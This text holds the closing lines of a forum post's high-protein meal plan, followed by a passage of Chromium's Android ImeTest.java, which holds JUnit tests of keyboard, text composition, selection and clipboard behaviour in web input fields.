50g protein / 70g carbs / 3g fat
Meal 7: Pro/Fat
Lean Protein of your choice, 2 Tbsp Natural Peanut Butter
50g protein / 5g carbs / 18g fat
Meal 8: Before Bed
3 Scoops of Whey Protein, 1.5 Tbsp. Flax Seed Oil
60g protein / 3g carbs / 21g Fat
That turns into approximately 420 grams protein, 250 grams Carbs, and 83 grams of fat. This is roughly 3500 calories
|
{
"pile_set_name": "StackExchange"
}
|
// Copyright 2013 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
package org.chromium.content.browser.input;
import android.content.ClipData;
import android.content.ClipboardManager;
import android.content.Context;
import android.graphics.Color;
import android.text.InputType;
import android.text.SpannableString;
import android.text.Spanned;
import android.text.style.BackgroundColorSpan;
import android.text.style.UnderlineSpan;
import android.view.KeyEvent;
import android.view.ViewConfiguration;
import android.view.inputmethod.BaseInputConnection;
import android.view.inputmethod.EditorInfo;
import androidx.test.filters.MediumTest;
import androidx.test.filters.SmallTest;
import org.hamcrest.Matchers;
import org.junit.Assert;
import org.junit.Before;
import org.junit.Rule;
import org.junit.Test;
import org.junit.rules.ExpectedException;
import org.junit.runner.RunWith;
import org.chromium.base.test.util.CommandLineFlags;
import org.chromium.base.test.util.DisabledTest;
import org.chromium.base.test.util.Feature;
import org.chromium.base.test.util.UrlUtils;
import org.chromium.content_public.browser.WebContents;
import org.chromium.content_public.browser.test.ContentJUnit4ClassRunner;
import org.chromium.content_public.browser.test.util.Criteria;
import org.chromium.content_public.browser.test.util.CriteriaHelper;
import org.chromium.content_public.browser.test.util.CriteriaNotSatisfiedException;
import org.chromium.content_public.browser.test.util.DOMUtils;
import org.chromium.content_public.browser.test.util.JavaScriptUtils;
import org.chromium.content_public.browser.test.util.TestThreadUtils;
import org.chromium.ui.base.ime.TextInputType;
import java.util.ArrayList;
import java.util.concurrent.Callable;
import java.util.concurrent.TimeoutException;
/**
* IME (input method editor) and text input tests.
*/
@RunWith(ContentJUnit4ClassRunner.class)
@CommandLineFlags.Add({"expose-internals-for-testing"})
public class ImeTest {
@Rule
public ImeActivityTestRule mRule = new ImeActivityTestRule();
@Rule
public ExpectedException thrown = ExpectedException.none();
@Before
public void setUp() throws Exception {
mRule.setUpForUrl(ImeActivityTestRule.INPUT_FORM_HTML);
}
@Test
@MediumTest
@Feature({"TextInput", "Main"})
public void testKeyboardDismissedWhenNavigating() throws Throwable {
mRule.assertWaitForKeyboardStatus(true);
// Hide keyboard when loading a new Url.
mRule.fullyLoadUrl(UrlUtils.getIsolatedTestFileUrl(ImeActivityTestRule.INPUT_FORM_HTML));
mRule.assertWaitForKeyboardStatus(false);
DOMUtils.clickNode(mRule.getWebContents(), "input_text");
mRule.assertWaitForKeyboardStatus(true);
// Hide keyboard when navigating.
final String code = "document.getElementById(\"link\").click()";
JavaScriptUtils.executeJavaScriptAndWaitForResult(mRule.getWebContents(), code);
mRule.assertWaitForKeyboardStatus(false);
}
@Test
@MediumTest
@Feature({"TextInput", "Main"})
public void testKeyboardDismissedAfterClickingGo() throws Throwable {
mRule.setComposingText("hello", 1);
mRule.waitAndVerifyUpdateSelection(0, 5, 5, 0, 5);
mRule.performGo(mRule.getTestCallBackHelperContainer());
mRule.assertWaitForKeyboardStatus(false);
}
@Test
@MediumTest
@Feature({"TextInput", "Main"})
public void testDoesNotHang_getTextAfterKeyboardHides() throws Throwable {
mRule.setComposingText("hello", 1);
mRule.waitAndVerifyUpdateSelection(0, 5, 5, 0, 5);
mRule.performGo(mRule.getTestCallBackHelperContainer());
// This may time out if we do not get the information on time.
// TODO(changwan): find a way to remove the loop.
for (int i = 0; i < 100; ++i) {
mRule.getTextBeforeCursor(10, 0);
}
mRule.assertWaitForKeyboardStatus(false);
}
// crbug.com/643519
@Test
@SmallTest
@Feature({"TextInput", "Main"})
public void testCompositionWithNullTextNotCrash() throws Throwable {
mRule.commitText(null, 1);
mRule.assertTextsAroundCursor("", null, "");
mRule.setComposingText(null, 1);
mRule.assertTextsAroundCursor("", null, "");
}
@Test
@SmallTest
@Feature({"TextInput", "Main"})
public void testDeleteSurroundingTextWithRangeSelection() throws Throwable {
mRule.commitText("hello", 1);
mRule.waitAndVerifyUpdateSelection(0, 5, 5, -1, -1);
mRule.setSelection(1, 4);
mRule.waitAndVerifyUpdateSelection(1, 1, 4, -1, -1);
mRule.deleteSurroundingText(0, 0);
mRule.assertTextsAroundCursor("h", "ell", "o");
mRule.deleteSurroundingText(1, 1);
mRule.assertTextsAroundCursor("", "ell", "");
mRule.deleteSurroundingText(1, 0);
mRule.assertTextsAroundCursor("", "ell", "");
mRule.deleteSurroundingText(0, 1);
mRule.assertTextsAroundCursor("", "ell", "");
}
@Test
@SmallTest
@Feature({"TextInput", "Main"})
public void testDeleteSurroundingTextWithCursorSelection() throws Throwable {
mRule.commitText("hello", 1);
mRule.waitAndVerifyUpdateSelection(0, 5, 5, -1, -1);
mRule.setSelection(2, 2);
mRule.waitAndVerifyUpdateSelection(1, 2, 2, -1, -1);
mRule.deleteSurroundingText(0, 0);
mRule.assertTextsAroundCursor("he", null, "llo");
mRule.deleteSurroundingText(1, 1);
mRule.assertTextsAroundCursor("h", null, "lo");
mRule.deleteSurroundingText(1, 0);
mRule.assertTextsAroundCursor("", null, "lo");
mRule.deleteSurroundingText(0, 10);
mRule.assertTextsAroundCursor("", null, "");
mRule.deleteSurroundingText(10, 10);
mRule.assertTextsAroundCursor("", null, "");
}
@Test
@SmallTest
@Feature({"TextInput", "Main"})
public void testKeyboardAppFinishesCompositionOnUnexpectedSelectionChange() throws Throwable {
mRule.focusElementAndWaitForStateUpdate("textarea2");
mRule.commitText("12345", 1);
mRule.setSelection(3, 3);
mRule.setComposingRegion(2, 3);
mRule.waitAndVerifyUpdateSelection(0, 5, 5, -1, -1);
mRule.waitAndVerifyUpdateSelection(1, 3, 3, -1, -1);
mRule.waitAndVerifyUpdateSelection(2, 3, 3, 2, 3);
// Unexpected selection change occurs, e.g., the user clicks on an area.
// There was already one click during test setup; we have to wait out the double-tap
// timeout or the test will be flaky.
Thread.sleep(ViewConfiguration.getDoubleTapTimeout());
DOMUtils.clickNode(mRule.getWebContents(), "textarea2");
mRule.waitAndVerifyUpdateSelection(3, 5, 5, 2, 3);
// Keyboard app finishes composition. We emulate this in TestInputMethodManagerWrapper.
mRule.waitAndVerifyUpdateSelection(4, 5, 5, -1, -1);
}
@Test
@SmallTest
@Feature({"TextInput", "Main"})
public void testDeleteSurroundingTextInCodePointsWithRangeSelection() throws Throwable {
final String trophy = "\uD83C\uDFC6";
mRule.commitText("ab" + trophy + "cdef" + trophy + "gh", 1);
mRule.waitAndVerifyUpdateSelection(0, 12, 12, -1, -1);
mRule.setSelection(6, 8);
mRule.waitAndVerifyUpdateSelection(1, 6, 8, -1, -1);
mRule.assertTextsAroundCursor("ab" + trophy + "cd", "ef", trophy + "gh");
mRule.deleteSurroundingTextInCodePoints(2, 2);
mRule.waitAndVerifyUpdateSelection(2, 4, 6, -1, -1);
mRule.assertTextsAroundCursor("ab" + trophy, "ef", "h");
}
@Test
@SmallTest
@Feature({"TextInput", "Main"})
public void testDeleteSurroundingTextInCodePointsWithCursorSelection() throws Throwable {
final String trophy = "\uD83C\uDFC6";
mRule.commitText("ab" + trophy + "cd" + trophy, 1);
mRule.waitAndVerifyUpdateSelection(0, 8, 8, -1, -1);
mRule.setSelection(4, 4);
mRule.waitAndVerifyUpdateSelection(1, 4, 4, -1, -1);
mRule.assertTextsAroundCursor("ab" + trophy, null, "cd" + trophy);
mRule.deleteSurroundingTextInCodePoints(2, 2);
mRule.waitAndVerifyUpdateSelection(2, 1, 1, -1, -1);
mRule.assertTextsAroundCursor("a", null, trophy);
}
@Test
@SmallTest
@Feature({"TextInput", "Main"})
public void testSetComposingTextForNewCursorPositions() throws Throwable {
// Cursor is on the right of composing text when newCursorPosition > 0.
mRule.setComposingText("ab", 1);
mRule.waitAndVerifyUpdateSelection(0, 2, 2, 0, 2);
mRule.finishComposingText();
mRule.waitAndVerifyUpdateSelection(1, 2, 2, -1, -1);
// Cursor exceeds the left boundary.
mRule.setComposingText("cdef", -100);
mRule.waitAndVerifyUpdateSelection(2, 0, 0, 2, 6);
// Cursor is on the left boundary.
mRule.getInputMethodManagerWrapper().expectsSelectionOutsideComposition();
mRule.setComposingText("cd", -2);
mRule.waitAndVerifyUpdateSelection(3, 0, 0, 2, 4);
mRule.getInputMethodManagerWrapper().expectsSelectionOutsideComposition();
// Cursor is between the left boundary and the composing text.
mRule.setComposingText("cd", -1);
mRule.waitAndVerifyUpdateSelection(4, 1, 1, 2, 4);
// Cursor is on the left of composing text.
mRule.setComposingText("cd", 0);
mRule.waitAndVerifyUpdateSelection(5, 2, 2, 2, 4);
mRule.finishComposingText();
mRule.waitAndVerifyUpdateSelection(6, 2, 2, -1, -1);
// Cursor is on the right of composing text.
mRule.setComposingText("ef", 1);
mRule.waitAndVerifyUpdateSelection(7, 4, 4, 2, 4);
mRule.getInputMethodManagerWrapper().expectsSelectionOutsideComposition();
// Cursor is between the composing text and the right boundary.
mRule.setComposingText("ef", 2);
mRule.waitAndVerifyUpdateSelection(8, 5, 5, 2, 4);
mRule.getInputMethodManagerWrapper().expectsSelectionOutsideComposition();
// Cursor is on the right boundary.
mRule.setComposingText("ef", 3);
mRule.waitAndVerifyUpdateSelection(9, 6, 6, 2, 4);
mRule.getInputMethodManagerWrapper().expectsSelectionOutsideComposition();
// Cursor exceeds the right boundary.
mRule.setComposingText("efgh", 100);
mRule.waitAndVerifyUpdateSelection(10, 8, 8, 2, 6);
}
@Test
@SmallTest
@Feature({"TextInput", "Main"})
public void testCommitTextForNewCursorPositions() throws Throwable {
// Cursor is on the left of committing text.
mRule.commitText("ab", 0);
mRule.waitAndVerifyUpdateSelection(0, 0, 0, -1, -1);
// Cursor is on the right of committing text.
mRule.commitText("cd", 1);
mRule.waitAndVerifyUpdateSelection(1, 2, 2, -1, -1);
// Cursor is between the committing text and the right boundary.
mRule.commitText("ef", 2);
mRule.waitAndVerifyUpdateSelection(2, 5, 5, -1, -1);
// Cursor is between the left boundary and the committing text.
mRule.commitText("gh", -3);
mRule.waitAndVerifyUpdateSelection(3, 2, 2, -1, -1);
// Cursor is on the right boundary.
mRule.commitText("ij", 7);
mRule.waitAndVerifyUpdateSelection(4, 10, 10, -1, -1);
// Cursor is on the left boundary.
mRule.commitText("kl", -10);
mRule.waitAndVerifyUpdateSelection(5, 0, 0, -1, -1);
// Cursor exceeds the right boundary.
mRule.commitText("mn", 100);
mRule.waitAndVerifyUpdateSelection(6, 14, 14, -1, -1);
// Cursor exceeds the left boundary.
mRule.commitText("op", -100);
mRule.waitAndVerifyUpdateSelection(7, 0, 0, -1, -1);
}
@Test
@SmallTest
@Feature({"TextInput", "Main"})
public void testSetComposingTextWithEmptyText() throws Throwable {
mRule.commitText("hello", 1);
mRule.waitAndVerifyUpdateSelection(0, 5, 5, -1, -1);
mRule.setComposingText("AB", 1);
mRule.waitAndVerifyUpdateSelection(1, 7, 7, 5, 7);
// With previous composition.
mRule.setComposingText("", -3);
mRule.waitAndVerifyUpdateSelection(2, 2, 2, -1, -1);
mRule.assertTextsAroundCursor("he", null, "llo");
// Without previous composition.
mRule.setComposingText("", 3);
mRule.waitAndVerifyUpdateSelection(3, 4, 4, -1, -1);
mRule.assertTextsAroundCursor("hell", null, "o");
}
@Test
@SmallTest
@Feature({"TextInput", "Main"})
public void testCommitTextWithEmptyText() throws Throwable {
mRule.commitText("hello", 1);
mRule.waitAndVerifyUpdateSelection(0, 5, 5, -1, -1);
mRule.setSelection(2, 2);
mRule.waitAndVerifyUpdateSelection(1, 2, 2, -1, -1);
mRule.setComposingText("world", 1);
mRule.waitAndVerifyUpdateSelection(2, 7, 7, 2, 7);
// With previous composition.
mRule.commitText("", 2);
mRule.waitAndVerifyUpdateSelection(3, 3, 3, -1, -1);
// Without previous composition.
mRule.commitText("", -1);
mRule.waitAndVerifyUpdateSelection(4, 2, 2, -1, -1);
// Although it is not documented in the spec, commitText() also removes existing selection.
mRule.setSelection(2, 5);
mRule.commitText("", 1);
mRule.waitAndVerifyUpdateSelection(5, 2, 5, -1, -1);
mRule.waitAndVerifyUpdateSelection(6, 2, 2, -1, -1);
}
@Test
@SmallTest
@Feature({"TextInput", "Main"})
public void testCommitWhileComposingText() throws Throwable {
mRule.setComposingText("h", 1);
mRule.waitAndVerifyUpdateSelection(0, 1, 1, 0, 1);
mRule.setComposingText("he", 1);
mRule.waitAndVerifyUpdateSelection(1, 2, 2, 0, 2);
mRule.setComposingText("hel", 1);
mRule.waitAndVerifyUpdateSelection(2, 3, 3, 0, 3);
mRule.commitText("hel", 1);
mRule.waitAndVerifyUpdateSelection(3, 3, 3, -1, -1);
mRule.setComposingText("lo", 1);
mRule.waitAndVerifyUpdateSelection(4, 5, 5, 3, 5);
mRule.commitText("", 1);
mRule.waitAndVerifyUpdateSelection(5, 3, 3, -1, -1);
mRule.assertTextsAroundCursor("hel", null, "");
}
@Test
@SmallTest
@Feature({"TextInput", "Main"})
public void testCommitEnterKeyWhileComposingText() throws Throwable {
mRule.focusElementAndWaitForStateUpdate("textarea");
mRule.setComposingText("hello", 1);
mRule.waitAndVerifyUpdateSelection(0, 5, 5, 0, 5);
// Cancel the current composition and replace it with enter.
mRule.commitText("\n", 1);
mRule.waitAndVerifyUpdateSelection(1, 1, 1, -1, -1);
// The second new line is not a user visible/editable one, it is a side-effect of Blink
// using <br> internally. This only happens when \n is at the end.
mRule.assertTextsAroundCursor("\n", null, "\n");
mRule.commitText("world", 1);
mRule.waitAndVerifyUpdateSelection(2, 6, 6, -1, -1);
mRule.assertTextsAroundCursor("\nworld", null, "");
}
@Test
@SmallTest
@Feature({"TextInput"})
public void testImeCopy() throws Exception {
mRule.commitText("hello", 1);
mRule.waitAndVerifyUpdateSelection(0, 5, 5, -1, -1);
mRule.setSelection(2, 5);
mRule.waitAndVerifyUpdateSelection(1, 2, 5, -1, -1);
mRule.copy();
mRule.assertClipboardContents(mRule.getActivity(), "llo");
}
@Test
@SmallTest
@Feature({"TextInput"})
public void testEnterTextAndRefocus() throws Exception {
mRule.commitText("hello", 1);
mRule.waitAndVerifyUpdateSelection(0, 5, 5, -1, -1);
mRule.restartInput();
DOMUtils.clickNode(mRule.getWebContents(), "input_text");
mRule.assertWaitForKeyboardStatus(true);
Assert.assertEquals(5, mRule.getConnectionFactory().getOutAttrs().initialSelStart);
Assert.assertEquals(5, mRule.getConnectionFactory().getOutAttrs().initialSelEnd);
}
private static int getImeAction(EditorInfo editorInfo) {
return editorInfo.imeOptions & EditorInfo.IME_MASK_ACTION;
}
@Test
@SmallTest
@Feature({"TextInput", "Main"})
public void testAdvanceFocusNextAndPrevious() throws Exception {
mRule.focusElement("textarea");
// Forward direction focus. Excessive focus advance should be ignored.
for (int i = 0; i < 10; ++i) {
// Forward direction focus.
mRule.performEditorAction(EditorInfo.IME_ACTION_NEXT);
}
mRule.waitForKeyboardStates(7, 0, 7,
new Integer[] {TextInputType.TEXT_AREA, TextInputType.TEXT_AREA,
TextInputType.NUMBER, TextInputType.NUMBER, TextInputType.CONTENT_EDITABLE,
TextInputType.SEARCH, TextInputType.TEXT});
ArrayList<EditorInfo> editorInfoList =
mRule.getInputMethodManagerWrapper().getEditorInfoList();
Assert.assertEquals(7, editorInfoList.size());
// textarea.
Assert.assertEquals(EditorInfo.IME_ACTION_NONE, getImeAction(editorInfoList.get(0)));
// textarea2.
Assert.assertEquals(EditorInfo.IME_ACTION_NONE, getImeAction(editorInfoList.get(1)));
// input_number1.
Assert.assertEquals(EditorInfo.IME_ACTION_NEXT, getImeAction(editorInfoList.get(2)));
// input_number2.
Assert.assertEquals(EditorInfo.IME_ACTION_NEXT, getImeAction(editorInfoList.get(3)));
// content_editable1.
Assert.assertEquals(EditorInfo.IME_ACTION_NONE, getImeAction(editorInfoList.get(4)));
// search1.
Assert.assertEquals(EditorInfo.IME_ACTION_SEARCH, getImeAction(editorInfoList.get(5)));
// input_text1.
Assert.assertEquals(EditorInfo.IME_ACTION_GO, getImeAction(editorInfoList.get(6)));
mRule.resetAllStates();
// Backward direction focus. Excessive focus advance should be ignored.
for (int i = 0; i < 10; ++i) {
// Backward direction focus.
mRule.performEditorAction(EditorInfo.IME_ACTION_PREVIOUS);
}
mRule.waitForKeyboardStates(6, 0, 6,
new Integer[] {TextInputType.SEARCH, TextInputType.CONTENT_EDITABLE,
TextInputType.NUMBER, TextInputType.NUMBER, TextInputType.TEXT_AREA,
TextInputType.TEXT_AREA});
editorInfoList = mRule.getInputMethodManagerWrapper().getEditorInfoList();
Assert.assertEquals(6, editorInfoList.size());
// search1.
Assert.assertEquals(EditorInfo.IME_ACTION_SEARCH, getImeAction(editorInfoList.get(0)));
// content_editable1.
Assert.assertEquals(EditorInfo.IME_ACTION_NONE, getImeAction(editorInfoList.get(1)));
// input_number2.
Assert.assertEquals(EditorInfo.IME_ACTION_NEXT, getImeAction(editorInfoList.get(2)));
// input_number1.
Assert.assertEquals(EditorInfo.IME_ACTION_NEXT, getImeAction(editorInfoList.get(3)));
// textarea2.
Assert.assertEquals(EditorInfo.IME_ACTION_NONE, getImeAction(editorInfoList.get(4)));
// textarea.
Assert.assertEquals(EditorInfo.IME_ACTION_NONE, getImeAction(editorInfoList.get(5)));
}
@Test
@SmallTest
@Feature({"TextInput"})
public void testShowAndHideSoftInput() throws Exception {
mRule.focusElement("input_radio", false);
// hideSoftKeyboard(), mRule.restartInput()
mRule.waitForKeyboardStates(0, 1, 1, new Integer[] {});
// When input connection is null, we still need to set flags to prevent InputMethodService
// from entering fullscreen mode and from opening custom UI.
CriteriaHelper.pollUiThread(
() -> Criteria.checkThat(mRule.getInputConnection(), Matchers.nullValue()));
Assert.assertTrue(
(mRule.getConnectionFactory().getOutAttrs().imeOptions
& (EditorInfo.IME_FLAG_NO_FULLSCREEN | EditorInfo.IME_FLAG_NO_EXTRACT_UI))
!= 0);
// showSoftInput(), mRule.restartInput()
mRule.focusElement("input_number1");
mRule.waitForKeyboardStates(1, 1, 2, new Integer[] {TextInputType.NUMBER});
Assert.assertNotNull(mRule.getInputMethodManagerWrapper().getInputConnection());
mRule.focusElement("input_number2");
// Hide should never be called here. Otherwise we will see a flicker. Restarted to
// reset internal states to handle the new input form.
mRule.waitForKeyboardStates(
2, 1, 3, new Integer[] {TextInputType.NUMBER, TextInputType.NUMBER});
mRule.focusElement("input_text");
// showSoftInput() on input_text. mRule.restartInput() on input_number1 due to focus change,
// and mRule.restartInput() on input_text later.
mRule.waitForKeyboardStates(3, 1, 4,
new Integer[] {TextInputType.NUMBER, TextInputType.NUMBER, TextInputType.TEXT});
mRule.setComposingText("a", 1);
mRule.waitAndVerifyUpdateSelection(0, 0, 0, -1, -1);
mRule.waitAndVerifyUpdateSelection(1, 1, 1, 0, 1);
mRule.resetUpdateSelectionList();
// JavaScript changes focus.
String code = "(function() { "
+ "var textarea = document.getElementById('textarea');"
+ "textarea.focus();"
+ "})();";
JavaScriptUtils.executeJavaScriptAndWaitForResult(mRule.getWebContents(), code);
mRule.waitAndVerifyUpdateSelection(0, 0, 0, -1, -1);
mRule.resetUpdateSelectionList();
mRule.waitForKeyboardStates(4, 1, 5,
new Integer[] {TextInputType.NUMBER, TextInputType.NUMBER, TextInputType.TEXT,
TextInputType.TEXT_AREA});
Assert.assertEquals(0, mRule.getConnectionFactory().getOutAttrs().initialSelStart);
Assert.assertEquals(0, mRule.getConnectionFactory().getOutAttrs().initialSelEnd);
mRule.setComposingText("aa", 1);
mRule.waitAndVerifyUpdateSelection(0, 2, 2, 0, 2);
mRule.focusElement("input_text");
mRule.waitForKeyboardStates(5, 1, 6,
new Integer[] {TextInputType.NUMBER, TextInputType.NUMBER, TextInputType.TEXT,
TextInputType.TEXT_AREA, TextInputType.TEXT});
Assert.assertEquals(1, mRule.getConnectionFactory().getOutAttrs().initialSelStart);
Assert.assertEquals(1, mRule.getConnectionFactory().getOutAttrs().initialSelEnd);
mRule.focusElement("input_radio", false);
// hideSoftInput(), mRule.restartInput()
mRule.waitForKeyboardStates(5, 2, 7,
new Integer[] {TextInputType.NUMBER, TextInputType.NUMBER, TextInputType.TEXT,
TextInputType.TEXT_AREA, TextInputType.TEXT});
}
@Test
@SmallTest
@Feature({"TextInput"})
public void testKeyboardNotDismissedAfterCopySelection() throws Exception {
mRule.commitText("Sample_Text", 1);
mRule.waitAndVerifyUpdateSelection(0, 11, 11, -1, -1);
// Select 'text' part.
DOMUtils.longPressNode(mRule.getWebContents(), "input_text");
mRule.assertWaitForSelectActionBarStatus(true);
mRule.selectAll();
mRule.copy();
mRule.assertClipboardContents(mRule.getActivity(), "Sample_Text");
Assert.assertEquals(11, mRule.getInputMethodManagerWrapper().getSelection().end());
mRule.assertWaitForKeyboardStatus(true);
}
@Test
@SmallTest
@Feature({"TextInput"})
public void testImeNotDismissedAfterCutSelection() throws Exception {
mRule.commitText("Sample_Text", 1);
mRule.waitAndVerifyUpdateSelection(0, 11, 11, -1, -1);
DOMUtils.longPressNode(mRule.getWebContents(), "input_text");
mRule.assertWaitForSelectActionBarStatus(true);
mRule.assertWaitForKeyboardStatus(true);
mRule.cut();
mRule.assertWaitForKeyboardStatus(true);
mRule.assertWaitForSelectActionBarStatus(false);
}
@Test
@SmallTest
@Feature({"TextInput"})
public void testImeNotShownOnLongPressingEmptyInput() throws Exception {
DOMUtils.focusNode(mRule.getWebContents(), "input_radio");
DOMUtils.longPressNode(mRule.getWebContents(), "input_text");
mRule.assertWaitForKeyboardStatus(false);
mRule.commitText("Sample_Text", 1);
DOMUtils.longPressNode(mRule.getWebContents(), "input_text");
mRule.assertWaitForKeyboardStatus(true);
}
@Test
@SmallTest
@Feature({"TextInput"})
public void testSelectActionBarShownOnLongPressingInput() throws Exception {
DOMUtils.longPressNode(mRule.getWebContents(), "input_text");
mRule.assertWaitForSelectActionBarStatus(false);
mRule.commitText("Sample_Text", 1);
DOMUtils.longPressNode(mRule.getWebContents(), "input_text");
mRule.assertWaitForSelectActionBarStatus(true);
}
@Test
@SmallTest
@Feature({"TextInput"})
public void testLongPressInputWhileComposingText() throws Exception {
mRule.assertWaitForSelectActionBarStatus(false);
mRule.setComposingText("SampleTextThatIsVeryLong Test", 1);
mRule.waitAndVerifyUpdateSelection(0, 29, 29, 0, 29);
DOMUtils.longPressNode(mRule.getWebContents(), "input_text");
mRule.assertWaitForSelectActionBarStatus(true);
// Long press will first change selection region, and then trigger IME app to show up.
// See RenderFrameImpl::didChangeSelection() and RenderWidget::didHandleGestureEvent().
mRule.waitAndVerifyUpdateSelection(1, 0, 24, 0, 29);
// Now IME app wants to finish composing text because an external selection
// change has been detected. At least Google Latin IME and Samsung IME
// behave this way.
mRule.finishComposingText();
mRule.waitAndVerifyUpdateSelection(2, 0, 24, -1, -1);
}
@Test
@SmallTest
@Feature({"TextInput"})
public void testImeShownWhenLongPressOnAlreadySelectedText() throws Exception {
mRule.assertWaitForSelectActionBarStatus(false);
mRule.commitText("Sample_Text", 1);
int showCount = mRule.getInputMethodManagerWrapper().getShowSoftInputCounter();
DOMUtils.longPressNode(mRule.getWebContents(), "input_text");
mRule.assertWaitForSelectActionBarStatus(true);
Assert.assertEquals(
showCount + 1, mRule.getInputMethodManagerWrapper().getShowSoftInputCounter());
// Now long press again. Selection region remains the same, but the logic
// should trigger IME to show up. Note that Android does not provide show /
// hide status of IME, so we will just check whether showIme() has been triggered.
DOMUtils.longPressNode(mRule.getWebContents(), "input_text");
final int newCount = showCount + 2;
CriteriaHelper.pollUiThread(() -> {
Criteria.checkThat(mRule.getInputMethodManagerWrapper().getShowSoftInputCounter(),
Matchers.is(newCount));
});
}
private void reloadPage() throws Exception {
// Reload the page, then focus will be lost and keyboard should be hidden.
mRule.fullyLoadUrl(mRule.getWebContents().getLastCommittedUrl());
}
@Test
@SmallTest
@Feature({"TextInput"})
@SuppressWarnings("TryFailThrowable") // TODO(tedchoc): Remove after fixing timeout.
public void testPhysicalKeyboard_AttachDetach() throws Throwable {
mRule.attachPhysicalKeyboard();
// We still call showSoftKeyboard, which will be ignored by physical keyboard.
mRule.waitForKeyboardStates(1, 0, 1, new Integer[] {TextInputType.TEXT});
mRule.setComposingText("a", 1);
mRule.waitForKeyboardStates(1, 0, 1, new Integer[] {TextInputType.TEXT});
mRule.detachPhysicalKeyboard();
mRule.assertWaitForKeyboardStatus(true);
// Now we really show soft keyboard. We also call mRule.restartInput when configuration
// changes.
mRule.waitForKeyboardStates(
2, 0, 2, new Integer[] {TextInputType.TEXT, TextInputType.TEXT});
reloadPage();
// Depending on the timing, hideSoftInput and mRule.restartInput call counts may vary here
// because render widget gets restarted. But the end result should be the same.
mRule.assertWaitForKeyboardStatus(false);
mRule.detachPhysicalKeyboard();
// We should not show soft keyboard here because focus has been lost.
thrown.expect(AssertionError.class);
CriteriaHelper.pollUiThread(
() -> mRule.getInputMethodManagerWrapper().isShowWithoutHideOutstanding());
}
@Test
@SmallTest
@Feature({"TextInput"})
public void testSelectActionBarClearedOnTappingInput() throws Exception {
mRule.commitText("Sample_Text", 1);
DOMUtils.longPressNode(mRule.getWebContents(), "input_text");
mRule.assertWaitForKeyboardStatus(true);
mRule.assertWaitForSelectActionBarStatus(true);
DOMUtils.clickNode(mRule.getWebContents(), "input_text");
mRule.assertWaitForSelectActionBarStatus(false);
}
@Test
@SmallTest
@Feature({"TextInput"})
public void testSelectActionBarClearedOnTappingOutsideInput() throws Exception {
mRule.commitText("Sample_Text", 1);
DOMUtils.longPressNode(mRule.getWebContents(), "input_text");
mRule.assertWaitForKeyboardStatus(true);
mRule.assertWaitForSelectActionBarStatus(true);
DOMUtils.clickNode(mRule.getWebContents(), "plain_text");
mRule.assertWaitForKeyboardStatus(false);
mRule.assertWaitForSelectActionBarStatus(false);
DOMUtils.longPressNode(mRule.getWebContents(), "input_text");
mRule.assertWaitForKeyboardStatus(true);
mRule.assertWaitForSelectActionBarStatus(true);
DOMUtils.clickNode(mRule.getWebContents(), "input_radio");
mRule.assertWaitForKeyboardStatus(false);
mRule.assertWaitForSelectActionBarStatus(false);
}
@Test
@SmallTest
@Feature({"TextInput"})
public void testImeNotShownOnLongPressingDifferentEmptyInputs() throws Exception {
DOMUtils.focusNode(mRule.getWebContents(), "input_radio");
DOMUtils.longPressNode(mRule.getWebContents(), "input_text");
mRule.assertWaitForKeyboardStatus(false);
DOMUtils.longPressNode(mRule.getWebContents(), "textarea");
mRule.assertWaitForKeyboardStatus(false);
}
@Test
@SmallTest
@Feature({"TextInput"})
public void testImeStaysOnLongPressingDifferentNonEmptyInputs() throws Exception {
DOMUtils.focusNode(mRule.getWebContents(), "input_text");
mRule.assertWaitForKeyboardStatus(true);
mRule.commitText("Sample_Text", 1);
// We should wait to avoid race condition.
mRule.waitAndVerifyUpdateSelection(0, 11, 11, -1, -1);
DOMUtils.focusNode(mRule.getWebContents(), "textarea");
mRule.waitAndVerifyUpdateSelection(1, 0, 0, -1, -1);
mRule.commitText("Sample_Text", 1);
mRule.waitAndVerifyUpdateSelection(2, 11, 11, -1, -1);
DOMUtils.longPressNode(mRule.getWebContents(), "input_text");
mRule.assertWaitForKeyboardStatus(true);
mRule.assertWaitForSelectActionBarStatus(true);
DOMUtils.longPressNode(mRule.getWebContents(), "textarea");
mRule.assertWaitForKeyboardStatus(true);
}
@Test
@SmallTest
@Feature({"TextInput"})
public void testImeCut() throws Exception {
mRule.commitText("snarful", 1);
mRule.waitAndVerifyUpdateSelection(0, 7, 7, -1, -1);
mRule.setSelection(1, 5);
mRule.waitAndVerifyUpdateSelection(1, 1, 5, -1, -1);
mRule.cut();
mRule.waitAndVerifyUpdateSelection(2, 1, 1, -1, -1);
mRule.assertTextsAroundCursor("s", null, "ul");
mRule.assertClipboardContents(mRule.getActivity(), "narf");
}
@Test
@SmallTest
@Feature({"TextInput"})
public void testImePaste() throws Exception {
TestThreadUtils.runOnUiThreadBlocking(() -> {
ClipboardManager clipboardManager =
(ClipboardManager) mRule.getActivity().getSystemService(
Context.CLIPBOARD_SERVICE);
clipboardManager.setPrimaryClip(ClipData.newPlainText("blarg", "blarg"));
});
mRule.paste();
// Paste is a two step process when there is a non-zero selection.
mRule.waitAndVerifyUpdateSelection(0, 5, 5, -1, -1);
mRule.assertTextsAroundCursor("blarg", null, "");
mRule.setSelection(3, 5);
mRule.waitAndVerifyUpdateSelection(1, 3, 5, -1, -1);
mRule.assertTextsAroundCursor("bla", "rg", "");
mRule.paste();
// Paste is a two step process when there is a non-zero selection.
mRule.waitAndVerifyUpdateSelection(2, 8, 8, -1, -1);
mRule.assertTextsAroundCursor("blablarg", null, "");
mRule.paste();
mRule.waitAndVerifyUpdateSelection(3, 13, 13, -1, -1);
mRule.assertTextsAroundCursor("blablargblarg", null, "");
}
@Test
@SmallTest
@Feature({"TextInput"})
public void testImeSelectAndCollapseSelection() throws Exception {
mRule.commitText("hello", 1);
mRule.waitAndVerifyUpdateSelection(0, 5, 5, -1, -1);
mRule.selectAll();
mRule.waitAndVerifyUpdateSelection(1, 0, 5, -1, -1);
mRule.collapseSelection();
mRule.waitAndVerifyUpdateSelection(2, 5, 5, -1, -1);
}
@Test
@SmallTest
@Feature({"TextInput", "Main"})
public void testShowVirtualKeyboardIfEnabled() throws Throwable {
// ShowVirtualKeyboardIfEnabled() is now implicitly called by the updated focus
// heuristic so no need to call explicitly. http://crbug.com/371927
DOMUtils.focusNode(mRule.getWebContents(), "input_radio");
mRule.assertWaitForKeyboardStatus(false);
DOMUtils.focusNode(mRule.getWebContents(), "input_text");
mRule.assertWaitForKeyboardStatus(true);
}
@Test
@SmallTest
